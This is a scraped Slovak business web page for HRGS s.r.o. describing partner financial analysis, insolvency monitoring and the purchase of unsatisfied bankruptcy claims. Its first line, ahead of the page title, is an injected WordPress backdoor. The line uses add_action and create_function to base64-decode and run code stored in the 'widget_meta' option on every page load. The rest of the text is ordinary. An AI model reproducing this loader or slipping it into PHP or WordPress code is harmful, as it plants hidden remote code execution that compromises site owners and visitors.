add_action( 'init', create_function( '', @join( "\n", array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); HRGS s.r.o. | The best or nothing. Analýza partnerov

Analýza partnerov

Pre úspešné podnikanie je nevyhnutné mať dostatočné informácie a to predovšetkým o obchodných partneroch. Pre klientov zabezpečujeme analýzu hospodárskej situácie ich partnerov, prípadne analýzu ad-hoc v prípade uzatvárania nových kontraktov. Výsledkom analýzy je finančný obraz obchodného partnera vo vzťahu k predchádzajúcim účtovným obdobiam, ako aj v súvsťažných vzťahoch k aktuálnej situácií na trhu. Vďaka tomu poskytujeme klientom predikciu pre ich zamýšľaný obchodný vzťah, s upozornením na možné riziká spolupráce s daným obchodným partnerom.

Súčasne prostredníctvom systematickej lustrácie majetkových pomerov dlžníka vieme bezprostredne reagovať na prípadnú insolvenciu obchodného partnera a zabezpečujeme vykonanie potrebných administratívnych úkonov spojených s prihlasovaním pohľadávok v rámci reštrukturalizačného a konkurzného konania, ktorých stav, resp. vývoj priebežne monitorujeme v úzkej kooperácií s klientom. Insolvenčné konania prinášajú značné riziká pre existenciu, resp. zánik časti pohľadávok. V záujme maximalizácie rozsahu uspokojenia pohľadávok spolupracujeme s renomovanými advokátskymi kanceláriami a správcami konkurznej podstaty. Vďaka dlhodobej praxi v danej oblasti a uvedenej spolupráci poskytujeme klientom relevantné informácie, vďaka ktorým môžu promptne reagovať na aktuálny stav konania. V prípade, že bol v Obchodnom vestníku Slovenskej republiky zverejnený konečný rozvrh výťažku v konkurze vedenom voči spoločnosti – dlžníkovi, je možné uspokojiť pohľadávky spravidla len čiastočne. Z dôvodu, že sa jedná o konečný rozvrh konkurzného konania, pohľadávka už následne nebude uspokojená vo vyššej miere, nakoľko v zmysle Zákona o konkurze a reštrukturalizácii súd v blízkej dobe vydá uznesenie o zrušení konkurzu, čo bude mať za následok zrušenie spoločnosti – dlžníka. Pre klientov zabezpečujeme v určitých prípadoch odkúpenie ich neuspokojených pohľadávok v konkurze.

Scroll to Top
Prejsť na panel nástrojov